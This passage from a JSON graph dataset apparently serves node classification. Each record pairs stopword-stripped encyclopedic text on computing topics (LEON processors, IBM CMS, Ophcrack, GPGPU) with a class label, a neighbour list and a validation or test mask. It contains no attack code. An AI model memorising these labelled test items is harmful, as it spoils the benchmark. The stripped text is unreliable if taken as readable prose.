linux distributions longer including default many networks formerly relied rlogin telnet replaced ssh rlogin-equivalent slogin",
    "neighbors": [
      10242,
      515,
      9733,
      9735,
      10271,
      2085,
      562,
      5179,
      3133,
      5181,
      8265,
      3659,
      4687,
      10341,
      9320,
      10344,
      5759,
      649,
      9868,
      4750,
      3218,
      9365,
      2198,
      11413,
      6812,
      7325,
      3742,
      9380,
      9381,
      3751,
      3752,
      7847,
      10924,
      9909,
      7356,
      4797,
      8386,
      7364,
      8395,
      5843,
      7895,
      9946,
      8414,
      8432,
      4850,
      11001,
      3847,
      7943,
      5397,
      10005,
      5402,
      4398,
      1839,
      7983,
      823,
      1336,
      5433,
      5435,
      10555,
      5437,
      2887,
      8522,
      6993,
      2904,
      5469,
      5470,
      2399,
      5471,
      5472,
      11112,
      367,
      5492,
      2947,
      1412,
      10631,
      3976,
      4490,
      5516,
      5531,
      5032,
      2996,
      10171,
      11196,
      3006,
      9151,
      965,
      2509,
      6624,
      6120,
      10732,
      4589,
      9204,
      4085,
      6138,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8505,
    "label": 2,
    "text": "Miller_columns:miller columns miller columns also known cascading lists browsing/visualization technique applied tree structures columns allow multiple levels hierarchy open provide visual representation current location closely related techniques used earlier smalltalk browser independently invented mark s. miller 1980 yale university technique used project xanadu datapoint next datapoint miller generalized technique browse directed graphs labeled nodes arcs cases technique appropriate structures high degree large fanout low-degree structures outline editors graph viewers effective miller columns well known today “ columns view ” mode mac os x finder well browser view itunes columns finder descend directly nextstep file viewer use miller columns going back 1986 gnustep project continues offer miller column browser closely follows next approach bringing advantages column browser linux bsd operating systems large tree structures ipod browsing categories audio file tag attributes reminiscent column browsing although one column visible time many software music players implement tag browsing feature utilizes miller columns miller columns several issues usability standpoint",
    "neighbors": [
      576,
      6797,
      5294,
      7983,
      8304,
      823,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 8506,
    "label": 3,
    "text": "MIPS-3D:mips-3d mips-3d extension mips v instruction set architecture isa added 13 new instructions improving performance 3d graphics applications instructions improved performance reducing number instructions required implement four common 3d graphics operations vertex transformation clipping transformation lighting vertex transformation clipping perspective division normalization",
    "neighbors": [
      8450,
      2821,
      1798,
      4491,
      6924,
      4237,
      6038,
      9369,
      9500,
      2088,
      9391,
      8120,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      5326,
      977,
      2514,
      5844,
      9428,
      8795,
      2655,
      1122,
      7783,
      10985,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      4603,
      10620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8507,
    "label": 2,
    "text": "Job_File_Table:job file table job file table jft dos data structure program segment prefix psp starts psp offset 0x18 20 bytes long open file handle dos stores index system file table sft file handle returned codice_1 codice_2 similar functions simply index jft dos stored sft entry index file device program opened program starts first 5 entries jft preconnected standard devices handles marked closed setting value entry 0xff standard devices initialised follows handles 0-2 connected console device program execution get modified closed redirected like handle size jft psp limited 20 bytes originally 15 files 20-5 standard devices could open time ms-dos 2.0 extended job file table introduced allowed 254 files opened ms-dos 3.30 size jft modified call codice_3",
    "neighbors": [
      8529
    ],
    "mask": "Test"
  },
  {
    "node_id": 8508,
    "label": 3,
    "text": "LEON:leon leon meaning lion 32-bit cpu microprocessor core based sparc-v8 risc architecture instruction set designed sun microsystems originally designed european space research technology centre estec part european space agency esa gaisler research described synthesizable vhdl leon dual license model lgpl/gpl floss license used without licensing fee proprietary license purchased integration proprietary product core configurable vhdl generics used system-on-a-chip soc designs research commercial settings leon project started european space agency esa late 1997 study develop high-performance processor used european space projects objectives project provide open portable non-proprietary processor design capable meet future requirements performance software compatibility low system cost another objective able manufacture single event upset seu tolerant sensitive semiconductor process maintain correct operation presence seus extensive error detection error handling functions needed goals detect tolerate one error register without software intervention suppress effects single event transient set errors combinational logic leon family includes first leon1 vhsic hardware description language vhdl design used leonexpress test chip developed 0.25 μm technology prove fault-tolerance concept second leon2 vhdl design used processor device at697 atmel f various system-on-chip devices two leon implementations developed esa gaisler research part cobham aeroflex gaisler developed third leon3 design announced availability fourth generation leon leon4 processor leon processor implemented programmable logic fpga manufactured asic section subsequent subsections focus leon processors soft ip cores summarise main features processor version infrastructure processor packaged referred leon distribution processors leon series based sparc-v8 risc architecture leon2 -ft five-stage pipeline later versions seven-stage pipeline leon2 leon2-ft distributed system-on-chip design modified using graphical configuration tool leon2 -ft design extended re-used designs structure emphasise re-using parts design building blocks enable designers easily incorporate new ip cores design standard leon2 -ft distribution includes following support cores leon3 leon3ft leon4 cores typically used together grlib ip library leon2 distributions contain one design used several target technologies grlib contains several template designs fpga development boards asic targets modified using graphical configuration tool similar one leon2 distribution leon/grlib package contains larger number cores compared leon2 distributions also include plug play extension on-chip amba bus ip cores available grlib include design flow documentation leon fpga available manufacturer third party resources term leon2/leon2-ft often refer leon2 system-on-chip design leon2 processor core together standard set peripherals available leon2 -ft distribution later processors leon series used wide range designs therefore tightly coupled standard set peripherals leon3 leon4 name typically refers processor core leon/grlib used refer complete system-on-chip design leon2 following characteristics leon2-ft processor single event upset fault tolerant ft version leon2 processor flip-flops protected triple modular redundancy internal external memories protected edac parity bits special licence restrictions apply ip distributed european space agency among satellites processor used esa intermediate experimental vehicle ixv 2015 china chang e 4 lunar lander leon3 synthesisable vhdl model 32-bit processor compliant sparc v8 architecture model highly configurable particularly suitable system-on-a-chip soc designs full source code available gnu gpl license allowing use purpose without licensing fee leon3 also available proprietary license allowing used proprietary applications several differences two leon2 processor models leon3 leon3 includes smp support seven-stage pipeline leon2 support smp five-stage pipeline leon3ft fault-tolerant version standard leon3 sparc v8 processor designed operation harsh space environment includes functionality detect correct single event upset seu errors on-chip ram memories leon3ft processor supports functionality standard leon3 processor adds following features following features standard leon3 processor supported leon3ft leon3ft core distributed together special ft version grlip ip library netlist distribution possible fpga implementation called leon3ft-rtax proposed critical space applications january 2010 fourth version leon processor released release following new features real-time operating systems support leon core currently rtlinux pikeos ecos rtems nucleus threadx opencomrtos vxworks per port gaisler research lynxos also per port gaisler research pok free arinc653 implementation released bsd licence ork+ open-source real-time kernel high-integrity real-time applications ravenscar profile",
    "neighbors": [
      9857,
      9366,
      9371,
      4773,
      10789,
      3886,
      9391,
      2224,
      3762,
      10675,
      6716,
      6207,
      9665,
      6979,
      11333,
      3911,
      8523,
      3159,
      10974,
      11487,
      5861,
      3175,
      10984,
      5355,
      1776,
      10483,
      11125,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 8509,
    "label": 2,
    "text": "Conversational_Monitor_System:conversational monitor system conversational monitor system cms – originally cambridge monitor system simple interactive single-user operating system cms originally developed part ibm cp/cms operating system went production use 1967 cms part ibm vm family runs ibm mainframe computers vm first announced 1972 still use today z/vm cms runs guest operating system private virtual machine created vm control program control program plus cms together create multi-user time-sharing operating system cms originally developed part ibm cp/cms operating system time acronym meant cambridge monitor system also console monitor system 1972 ibm released vm/370 operating system re-implementation cp/cms system/370 announcement also added virtual memory hardware system/370 series unlike cp/cms vm/370 supported ibm vm went series versions still use today z/vm distinct versions releases cms platform remained still quite recognizable close descendant original cms version running cp-40 many key user interface decisions familiar today users already made 1965 part cp-40 effort see cms cp-40 examples vm cp/cms checkered histories ibm vm one ibm strategic operating systems primarily os dos families suffered ibm political infighting time-sharing versus batch processing goals conflict cp/cms originally released unsupported system vm often limited development support resources within ibm exceptionally strong user community first established self-support days cp/cms remaining active launch vm made substantial contributions operating system mitigated difficulties running ibm operating system cms intrinsic part vm/cms architecture established cp/cms cms user control private virtual machine – simulated copy underlying physical computer – cms runs stand-alone operating system approach remained consistent years based details cms interacts virtual machine environment found vm cp/cms articles cms originally built stand-alone operating system capable running bare machine though course nobody would choose however cms longer run outside vm environment provides hypervisor interface needed various critical functions cms provides users environment running applications batch jobs managing data files creating debugging applications cross-platform development communicating systems users cms still development wide use today users log vm providing userid password boot virtual machine done issuing command ipl cms ipl initial program load traditional ibm jargon booting machine though normally done automatically user personal customization done standard shell script file named profile exec sets user-specified environmental defaults disks libraries accessed cms started era teletype-style paper terminals later glass teletype dumb terminals late 1970s however vm users connecting via full-screen terminals – particularly ibm 3270 ubiquitous transaction processing terminal ibm mainframes 3270 played strategic role ibm product line making selection natural choice large data centers day many manufacturers eventually offered bisync terminals emulated 3270 protocol 3270s local buffer storage processing capabilities generally dealt entire screen data time handled editing tasks locally transmitted set fields entire page enter key program function key pfk pressed 3270 family incorporated smart control units concentrators network processing elements communicating mainframe dedicated circuits relatively high speeds via bisync synchronous data transmission protocol mainframe-oriented communication technologies provided capabilities taken granted modern communication networks device addressing routing error correction support variety configurations multipoint multidrop topologies historical note 3270 approach differed lower-cost dumb terminals period point-to-point asynchronous commercial time-sharing users important segment early cp/cms vm sites relied devices could connect via 300- 1200 bit/s modems normal voice-grade telephone circuits installing dedicated circuit 3270 often practical economical timely 3270 block-oriented approach consistent ibm batch- punched card-oriented view computing particularly important ibm mainframes day unlike contemporary minicomputers ibm mainframes equipped character-at-a-time interrupts dumb terminal support relied terminal control units ibm 270x see ibm 3705 memorex 1270 asynchronous terminal controllers assembled line characters fixed maximum length return key pressed typing many characters would result error familiar situation users day data centers include equipment except needed dial-up access 3270 approach preferred block-oriented terminals like 3270 made practical implement screen-oriented editors mainframes – opposed line-oriented editors previous norm important advantage contemporary minicomputers character-oriented systems availability via 3270 warmly welcomed gulf developed 3270 world focused page-oriented mainframe transaction processing especially via cics asynch terminal world focused character-oriented minicomputers dial-up timesharing asynchronous terminal vendors gradually improved products range smart terminal features usually accessed via escape sequences however devices rarely competed 3270 users ibm maintained dominance mainframe data center hardware purchase decisions viewed retrospect major philosophical divergence block-oriented character-oriented computing asynchronous terminal controllers 3270s provided mainframe block-oriented interactions – essentially made terminal input look like card reader approach preferred ibm led development entirely different user interface paradigms programming strategies character-oriented systems evolved differently difference apparent comparing atomic transaction approach dominant cics interactive stream-oriented style unix vm/cms evolved somewhere extremes cms command-driven stateful interactive environment rather adopting cics approach stateless transaction-oriented interface yet cms responds page- line-at-a-time interaction instead character interrupts cms earned good reputation efficient good human factors ease use relative standards time course prior widespread use graphical user interface environments commonly used today uncommon hundreds later thousands concurrent cms interactive users vm mainframe sub-second response times common 'trivial functions vm/cms consistently outperformed mvs ibm operating systems terms support simultaneous interactive users many cms users programmed languages cobol fortran pl/i c/370 apl scripting language rexx vm/cms often used development platform production systems ran ibm operating systems mvs cms users worked commercial software packages focus nomad spss sas one time cms also major environment e-mail office productivity important product ibm profs later renamed officevision two commonly used cms tools editor xedit rexx programming language products ported platforms widely used outside mainframe environment see vm operating system vm-related sources source citations",
    "neighbors": [
      2432,
      5378,
      4996,
      2181,
      7053,
      11539,
      789,
      5658,
      284,
      6557,
      9762,
      5678,
      7983,
      8879,
      5041,
      7217,
      8627,
      7477,
      7733,
      8502,
      10040,
      11075,
      5450,
      1999,
      7507,
      5463,
      2519,
      2395,
      2652,
      5612,
      2811,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8510,
    "label": 2,
    "text": "Apple_Pascal:apple pascal apple pascal implementation pascal apple ii apple iii computer series based ucsd pascal like ucsd pascal implementations ran operating system apple pascal operating system derivative ucsd p-system graphical extensions originally released apple ii august 1979 apple dos 3.2 apple pascal pioneered number features would later incorporated dos 3.3 well others would seen introduction prodos apple pascal software package also included disk maintenance utilities assembler meant complement apple built-in monitor assembler fortran compiler written silicon valley software sunnyvale california compiling p-code pascal also available apple pascal operating system introduced new disk format instead dividing disk 256-byte sectors dos 3.2 apple pascal divides blocks 512 bytes each.. p-system also introduced different method saving retrieving files apple dos files saved available sector os could find regardless location time could lead file system fragmentation slowing access disk apple pascal attempted rectify saving consecutive blocks disk innovations introduced file system included introduction timestamp feature previously file name basic type size would shown disks could also named first time limitations p-system included new restrictions naming files writing files consecutive blocks also created problems time free space tended become fragmented store new files utility called krunch included package consolidate free space biggest problem apple pascal system big fit one floppy disk meant system one floppy disk drive frequent disk swapping needed system needed least two disk drives order use operating system properly br br",
    "neighbors": [
      512,
      2179,
      8774,
      428,
      4844,
      5663,
      6414,
      8524,
      8767,
      8082,
      5363,
      9008,
      4341,
      11411,
      7479,
      1145,
      6558,
      2687
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8511,
    "label": 9,
    "text": "Calculus_of_constructions:calculus constructions mathematical logic computer science calculus constructions coc type theory created thierry coquand serve typed programming language constructive foundation mathematics second reason coc variants basis coq proof assistants variants include calculus inductive constructions adds inductive types calculus co inductive constructions adds coinduction predicative calculus inductive constructions removes impredicativity coc higher-order typed lambda calculus initially developed thierry coquand well known top barendregt lambda cube possible within coc define functions integers integers well integers types types types types integers coc strongly normalizing although impossible prove property within coc since implies consistency gödel incompleteness theorem impossible prove within system coc developed alongside coq proof assistant features added possible liabilities removed theory became available coq variants coc used proof assistants matita calculus constructions considered extension curry–howard isomorphism curry–howard isomorphism associates term simply typed lambda calculus natural-deduction proof intuitionistic propositional logic calculus constructions extends isomorphism proofs full intuitionistic predicate calculus includes proofs quantified statements also call propositions term calculus constructions constructed using following rules words term syntax bnf calculus constructions five kinds objects calculus constructions allows proving typing judgments read implication valid judgments calculus constructions derivable set inference rules following use formula_7 mean sequence type assignments formula_8 use k mean either p t. shall write formula_9 mean result substituting term formula_10 free variable formula_11 term formula_6 inference rule written form means 1. formula_16 3. formula_17 4. formula_18 5. formula_19 calculus constructions basic operators logical operator forming propositions formula_20 however one operator sufficient define logical operators basic data types used computer science defined within calculus constructions note booleans naturals defined way church encoding however additional problems arise propositional extensionality proof irrelevance",
    "neighbors": [
      5796,
      6188,
      4791,
      8924,
      6239
    ],
    "mask": "Test"
  },
  {
    "node_id": 8512,
    "label": 4,
    "text": "Amy_Koch:amy koch amy t. koch born october 8 1971 american politician former majority leader minnesota senate represented portions hennepin wright counties koch first female senate majority leader state history also regular commentator minnesota local media koch grew buffalo minnesota graduating buffalo high school 1990 briefly attending concordia college moorhead minnesota koch joined united states air force 1992 serving military koch met former husband christopher gave birth daughter rachel koch studied russian defense language institute california assigned national security agency fort meade maryland graduated honors stages military training received joint service commendation medal contribution intelligence community receiving honorable discharge air force 1996 koch returned buffalo minnesota attended st cloud state university earned bachelor degree 1999 managed expanded family power utility service company next years koch received mba capella university 2009 koch volunteered adult leader 4-h served vice chair st. francis xavier parish council well liaison education advisory board 2016 koch began working political strategist hylden advocacy law minneapolis koch part owner hbk properties llc buffalo 2013 koch bought maple lake bowl bowling alley north home buffalo mn koch owned operated bowling alley sold summer 2016 leaving military returning minnesota koch became active local republican politics addition serving local party unit board koch actively volunteered former congressman mark kennedy former secretary state mary kiffmeyer koch first elected minnesota senate 2005 special election replacing mark ourada resigned months earlier re-elected 2006 2010 koch former assistant minority leader first woman serve majority leader minnesota senate first republican since party affiliation inheriting 6.2 billion budget deficit 2011 koch helped integrate 20 new members caucus negotiated budget deficit turned surplus december 15 2011 surprise announcement koch said would resign post majority leader minnesota senate republican state senators indicated koch inappropriate relationship staffer whose identity would later confirmed former state senate aide michael brodkorb koch later apologized seek re-election another term minnesota senate",
    "neighbors": [
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 8513,
    "label": 4,
    "text": "Ophcrack:ophcrack ophcrack free open-source gpl licensed program cracks windows log-in passwords using lm hashes rainbow tables program includes ability import hashes variety formats including dumping directly sam files windows computers ophcrack crack passwords within minutes rainbow tables lm hashes provided free developers default ophcrack bundled tables allows crack passwords longer 14 characters using alphanumeric characters available free download four windows xp tables four windows vista tables objectif sécurité even larger tables purchase intended professional use larger rainbow tables ntlm hash cracking windows vista/windows 7 ophcrack also available live cd distributions automate retrieval decryption cracking passwords windows system one live cd distribution available windows xp lower well another windows vista windows 7 live cd distributions ophcrack built slitaz gnu/linux starting version 2.3 ophcrack also cracks ntlm hashes necessary generation lm hash disabled default windows vista password longer 14 characters case lm hash stored starting version 3.7.0 source code moved sourceforge gitlab",
    "neighbors": [
      7426,
      6916,
      7556,
      7557,
      3079,
      6797,
      3984,
      3477,
      10135,
      2716,
      4140,
      7983,
      823,
      7754,
      733,
      3937,
      4580,
      7914,
      8827,
      2045,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 8514,
    "label": 3,
    "text": "General-purpose_computing_on_graphics_processing_units:general-purpose computing graphics processing units general-purpose computing graphics processing units gpgpu rarely gpgp use graphics processing unit gpu typically handles computation computer graphics perform computation applications traditionally handled central processing unit cpu use multiple video cards one computer large numbers graphics chips parallelizes already parallel nature graphics processing addition even single gpu-cpu framework provides advantages multiple cpus offer due specialization chip essentially gpgpu pipeline kind parallel processing one gpus cpus analyzes data image graphic form gpus operate lower frequencies typically many times number cores thus gpus process far pictures graphical data per second traditional cpu migrating data graphical form using gpu scan analyze create large speedup gpgpu pipelines developed beginning 21st century graphics processing e.g. better shaders pipelines found fit scientific computing needs well since developed direction principle arbitrary boolean function including addition multiplication mathematical functions built-up functionally complete set logic operators 1987 conway game life became one first examples general purpose computing using early stream processor called blitter invoke special sequence logical operations bit vectors general-purpose computing gpus became practical popular 2001 advent programmable shaders floating point support graphics processors notably problems involving matrices and/or vectors especially two- three- four-dimensional vectors easy translate gpu acts native speed support types scientific computing community experiments new hardware began matrix multiplication routine 2001 one first common scientific programs run faster gpus cpus implementation lu factorization 2005 early efforts use gpus general-purpose processors required reformulating computational problems terms graphics primitives supported two major apis graphics processors opengl directx cumbersome translation obviated advent general-purpose programming languages apis sh/rapidmind brook accelerator followed nvidia cuda allowed programmers ignore underlying graphical concepts favor common high-performance computing concepts newer hardware vendor-independent offerings include microsoft directcompute apple/khronos group opencl means modern gpgpu pipelines leverage speed gpu without requiring full explicit conversion data graphical form language allows code running cpu poll gpu shader return values create gpgpu framework opencl dominant open general-purpose gpu computing language open standard defined khronos group opencl provides cross-platform gpgpu platform additionally supports data parallel compute cpus opencl actively supported intel amd nvidia arm platforms khronos group also standardised implemented sycl higher-level programming model opencl single-source domain specific embedded language based pure c++11 dominant proprietary framework nvidia cuda nvidia launched cuda 2006 software development kit sdk application programming interface api allows using programming language c code algorithms execution geforce 8 series later gpus programming standards parallel computing include opencl vendor-independent openacc openhmpp mark harris founder gpgpu.org coined term gpgpu created xcelerit designed accelerate large existing c++ c code-bases gpus minimal effort provides simplified programming model automates parallelisation manages devices memory compiles cuda binaries additionally multi-core cpus accelerators targeted source code openvidia developed university toronto 2003-2005 collaboration nvidia. created altimesh compiles common intermediate language cuda binaries supports generics virtual functions debugging profiling integrated visual studio nsight available visual studio extension visual studio marketplace microsoft introduced directcompute gpu computing api released directx 11 api. created quantalea introduces native gpu computing capabilities microsoft .net language f c alea gpu also provides simplified gpu programming model based gpu parallel-for parallel aggregate using delegates automatic memory management matlab supports gpgpu acceleration using parallel computing toolbox matlab distributed computing server third-party packages like jacket gpgpu processing also used simulate newtonian physics physics engines commercial implementations include havok physics fx physx typically used computer video games close metal called stream amd gpgpu technology ati radeon-based gpus c++ accelerated massive parallelism c++ amp library accelerates execution c++ code exploiting data-parallel hardware gpus due trend increasing power mobile gpus general-purpose programming became available also mobile devices running major mobile operating systems google android 4.2 enabled running renderscript code mobile device gpu apple introduced proprietary metal api ios applications able execute arbitrary code apple gpu compute shaders computer video cards produced various vendors nvidia amd ati cards vendors differ implementing data-format support integer floating-point formats 32-bit 64-bit microsoft introduced shader model standard help rank various features graphic cards simple shader model version number 1.0 2.0 3.0 etc. pre-directx 9 video cards supported paletted integer color types various formats available containing red element green element blue element sometimes another alpha value added used transparency common formats early fixed-function limited programmability graphics i.e. including directx 8.1-compliant gpus sufficient also representation used displays important note representation certain limitations given sufficient graphics processing power even graphics programmers would like use better formats floating point data formats obtain effects high dynamic range imaging many gpgpu applications require floating point accuracy came video cards conforming directx 9 specification directx 9 shader model 2.x suggested support two precision types full partial precision full precision support could either fp32 fp24 floating point 32- 24-bit per component greater partial precision fp16 ati radeon r300 series gpus supported fp24 precision programmable fragment pipeline although fp32 supported vertex processors nvidia nv30 series supported fp16 fp32 vendors s3 graphics xgi supported mixture formats fp24 implementations floating point nvidia gpus mostly ieee compliant however true across vendors implications correctness considered important scientific applications 64-bit floating point values double precision float commonly available cpus universally supported gpus gpu architectures sacrifice ieee compliance others lack double-precision efforts occurred emulate double-precision floating point values gpus however speed tradeoff negates benefit offloading computing onto gpu first place operations gpu operate vectorized fashion one operation performed four values example one color r1 g1 b1 modulated another color r2 g2 b2 gpu produce resulting color r1*r2 g1*g2 b1*b2 one operation functionality useful graphics almost every basic data type vector either 2- 3- 4-dimensional examples include vertices colors normal vectors texture coordinates many applications put good use higher performance vector instructions termed single instruction multiple data simd long available cpus originally data simply passed one-way central processing unit cpu graphics processing unit gpu display device time progressed however became valuable gpus store first simple complex structures data passed back cpu analyzed image set scientific-data represented 2d 3d format video card understand gpu access every draw operation analyze data forms quickly whereas cpu must poll every pixel data element much slowly speed access cpu larger pool random-access memory even worse case hard drive slower gpus video cards typically contain smaller amounts expensive memory much faster access transferring portion data set actively analyzed gpu memory form textures easily readable gpu forms results speed increase distinguishing feature gpgpu design ability transfer information bidirectionally back gpu cpu generally data throughput directions ideally high resulting multiplier effect speed specific high-use algorithm gpgpu pipelines may improve efficiency especially large data sets and/or data containing 2d 3d imagery used complex graphics pipelines well scientific computing fields large data sets like genome mapping two- three-dimensional analysis useful especially present biomolecule analysis protein study complex organic chemistry pipelines also vastly improve efficiency image processing computer vision among fields well parallel processing generally heavily optimized pipelines yielded speed increases several hundred times original cpu-based pipeline one high-use task simple example would gpu program collects data average lighting values renders view either camera computer graphics program back main program cpu cpu make adjustments overall screen view advanced example might use edge detection return numerical information processed image representing outlines computer vision program controlling say mobile robot gpu fast local hardware access every pixel picture element image analyze average first example apply sobel edge filter convolution filter second much greater speed cpu typically must access slower random-access memory copies graphic question gpgpu fundamentally software concept hardware concept type algorithm piece equipment specialized equipment designs may however even enhance efficiency gpgpu pipelines traditionally perform relatively algorithms large amounts data massively parallelized gigantic-data-level tasks thus may parallelized even via specialized setups rack computing many similar highly tailored machines built rack adds third layer many computing units using many cpus correspond many gpus bitcoin miners used setups high-quantity processing historically cpus used hardware-managed caches earlier gpus provided software-managed local memories however gpus increasingly used general-purpose applications state-of-the-art gpus designed hardware-managed multi-level caches helped gpus move towards mainstream computing example geforce 200 series gt200 architecture gpus feature l2 cache fermi gpu 768 kib last-level cache kepler gpu 1.5 mib last-level cache maxwell gpu 2 mib last-level cache pascal gpu 4 mib last-level cache gpus large register files allow reduce context-switching latency register file size also increasing different gpu generations e.g. total register file size maxwell gm200 pascal gpus 6 mib 14 mib respectively comparison size register file cpus small typically tens hundreds kilobytes several research projects compared energy efficiency gpus cpus fpgas gpus designed specifically graphics thus restrictive operations programming due design gpus effective problems solved using stream processing hardware used certain ways following discussion referring vertices fragments textures concerns mainly legacy model gpgpu programming graphics apis opengl directx used perform general-purpose computation introduction cuda nvidia 2007 opencl vendor-independent 2008 general-purpose computing apis new gpgpu codes longer necessary map computation graphics primitives stream processing nature gpus remains valid regardless apis used see e.g. gpus process independent vertices fragments process many parallel especially effective programmer wants process many vertices fragments way sense gpus stream processors processors operate parallel running one kernel many records stream stream simply set records require similar computation streams provide data parallelism kernels functions applied element stream gpus vertices fragments elements streams vertex fragment shaders kernels run element read input perform operations write output permissible multiple inputs multiple outputs never piece memory readable writable arithmetic intensity defined number operations performed per word memory transferred important gpgpu applications high arithmetic intensity else memory access latency limit computational speedup ideal gpgpu applications large data sets high parallelism minimal dependency data elements variety computational resources available gpu fact program substitute write texture output instead framebuffer done either render texture rtt render-to-backbuffer-copy-to-texture rtbctt recent stream-out common form stream take gpgpu 2d grid fits naturally rendering model built gpus many computations naturally map grids matrix algebra image processing physically based simulation since textures used memory texture lookups used memory reads certain operations done automatically gpu compute kernels thought body loops example programmer operating grid cpu might code looks like gpu programmer specifies body loop kernel data loop invoking geometry processing sequential code possible control flow program using if-then-else statements various forms loops flow control structures recently added gpus conditional writes could performed using properly crafted series arithmetic/bit operations looping conditional branching possible recent gpus allow branching usually performance penalty branching generally avoided inner loops whether cpu gpu code various methods static branch resolution pre-computation predication loop splitting z-cull used achieve branching hardware support exist map operation simply applies given function kernel every element stream simple example multiplying value stream constant increasing brightness image map operation simple implement gpu programmer generates fragment pixel screen applies fragment program one result stream size stored output buffer computations require calculating smaller stream possibly stream 1 element larger stream called reduction stream generally reduction performed multiple steps results prior step used input current step range operation applied reduced one stream element remains stream filtering essentially non-uniform reduction filtering involves removing items stream based criteria scan operation also termed parallel prefix sum takes vector stream data elements arbitrary associative binary function '+ identity element input a0 a1 a2 a3 ... exclusive scan produces output a0 a0 a1 a0 a1 a2 ... inclusive scan produces output a0 a0 a1 a0 a1 a2 a0 a1 a2 a3 ... require identity exist first glance operation may seem inherently serial efficient parallel scan algorithms possible implemented graphics processing units scan operation uses e.g. quicksort sparse matrix-vector multiplication scatter operation naturally defined vertex processor vertex processor able adjust position vertex allows programmer control information deposited grid extensions also possible controlling large area vertex affects fragment processor perform direct scatter operation location fragment grid fixed time fragment creation altered programmer however logical scatter operation may sometimes recast implemented another gather step scatter implementation would first emit output value output address immediately following gather operation uses address comparisons see whether output value maps current output slot dedicated compute kernels scatter performed indexed writes gather reverse scatter scatter reorders elements according map gather restore order elements according map scatter used dedicated compute kernels gather may performed indexed reads shaders performed texture-lookups sort operation transforms unordered set elements ordered set elements common implementation gpus using radix sort integer floating point data coarse-grained merge sort fine-grained sorting networks general comparable data search operation allows programmer find given element within stream possibly find neighbors specified element gpu used speed search individual element instead used run multiple searches parallel mostly search method used binary search sorted elements variety data structures represented gpu following areas gpus used general purpose computing gpgpu usage bioinformatics † expected speedups highly dependent system configuration gpu performance compared multi-core x86 cpu socket gpu performance benchmarked gpu supported features may kernel kernel performance comparison details configuration used view application website speedups per nvidia in-house testing isv documentation ‡ q=quadro gpu t=tesla gpu nvidia recommended gpus application check developer isv obtain certification information",
    "neighbors": [
      3585,
      7173,
      9739,
      9741,
      2066,
      7699,
      5655,
      10779,
      10781,
      2594,
      6181,
      8231,
      6184,
      1578,
      3630,
      9774,
      2045,
      6705,
      7218,
      1087,
      2623,
      2113,
      7234,
      3142,
      2635,
      1614,
      2638,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      3698,
      118,
      630,
      2680,
      6774,
      7802,
      8822,
      6268,
      3197,
      3203,
      6798,
      11406,
      7313,
      7326,
      6815,
      8352,
      5793,
      2210,
      6818,
      2213,
      5798,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      8890,
      4286,
      2241,
      2243,
      7164,
      9932,
      5329,
      2259,
      4308,
      10452,
      10966,
      2264,
      731,
      2781,
      11487,
      2273,
      2277,
      7911,
      10985,
      1770,
      5355,
      4332,
      5356,
      5358,
      9964,
      1776,
      8944,
      6900,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      8447,
      6916,
      1798,
      1801,
      11530,
      6926,
      6415,
      10512,
      785,
      1298,
      7442,
      9489,
      11539,
      2838,
      7963,
      2339,
      6950,
      2345,
      7978,
      4909,
      3886,
      309,
      8501,
      5948,
      10557,
      7998,
      4928,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      2383,
      7505,
      9044,
      2901,
      11604,
      344,
      2394,
      3934,
      6495,
      1376,
      8543,
      11618,
      1387,
      10603,
      11630,
      4465,
      10612,
      1399,
      2937,
      1402,
      7033,
      1916,
      11130,
      2943,
      3457,
      398,
      3470,
      5518,
      5523,
      1941,
      407,
      409,
      10658,
      9126,
      10669,
      7086,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      4036,
      453,
      3014,
      7111,
      1480,
      466,
      2008,
      1499,
      2525,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      9707,
      5612,
      10734,
      6639,
      8688,
      499,
      4596,
      10746,
      508,
      2557
    ],
    "mask": "Test"
  },
  {
    "node_id": 8515,
    "label": 7,
    "text": "Enstratius:enstratius enstratius formerly enstratus cloud computing infrastructure management platform intended address governance issues associated deploying systems public private hybrid clouds twenty public private clouds supported well configuration management tools chef puppet enstratius supports saas on-premises deployment models company originally formed 2008 enstratus networks spin-off marketing software maker valtira software forming backbone enstratus set cloud management tools valtira developed support cloud operations company announced publicly minnedemo conference february 2009 began accepting on-demand accounts co-founders david bagley george reese enstratius moved focus purely security wider problem governance multiple cloud computing environments 2010 enstratius spun part intellectual property open source project hosted github apache license called dasein cloud dasein cloud java abstraction api enstratius uses talk clouds supports company raised series financing 4.5 million november 2011 el dorado ventures vesbridge partners citrix march 2013 enstratus networks changed name enstratius inc. enstratius headquartered eden prairie minnesota remote workers across united states offices auckland new zealand edinburgh scotland may 2013 company acquired dell two weeks later dell discontinued cloud computing service june 2016 dell shifted enstratius product line support-only continue support customers longer selling cloud management platform",
    "neighbors": [
      5384,
      6153,
      11146,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      5499,
      2965,
      2328,
      4377,
      8986,
      10615,
      6307,
      9766,
      5159,
      6444,
      7983,
      8495,
      3121,
      54,
      7352,
      2496,
      4289,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      11221,
      8022,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      119,
      1400,
      2170,
      5371,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 8516,
    "label": 2,
